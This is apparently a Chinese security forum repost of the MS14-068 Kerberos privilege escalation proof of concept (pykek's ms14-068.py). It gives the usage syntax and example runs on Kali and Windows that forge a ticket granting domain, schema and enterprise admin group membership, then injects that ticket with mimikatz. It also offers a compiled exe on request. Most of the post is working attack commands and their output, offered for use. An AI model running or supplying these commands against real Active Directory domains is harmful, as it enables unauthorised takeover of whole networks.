MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

 

 

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

http://zone.wooyun.org/content/17102

https://www.t00ls.net/thread-28706-1-1.html

https://github.com/bidord/pykek 

ms14-068.py 

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : 

Domain Users (513) 
Domain Admins (512) 
Schema Admins (518) 
Enterprise Admins (519) 
Group Policy Creator Owners (520) 

USAGE: 

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> 

OPTIONS: 
    -p <clearPassword> 
--rc4 <ntlmHash> 
Example usage : 

Linux (tested with samba and MIT Kerberos) 

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

On Windows 

python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

exe版土司已发，需要的可以联系我。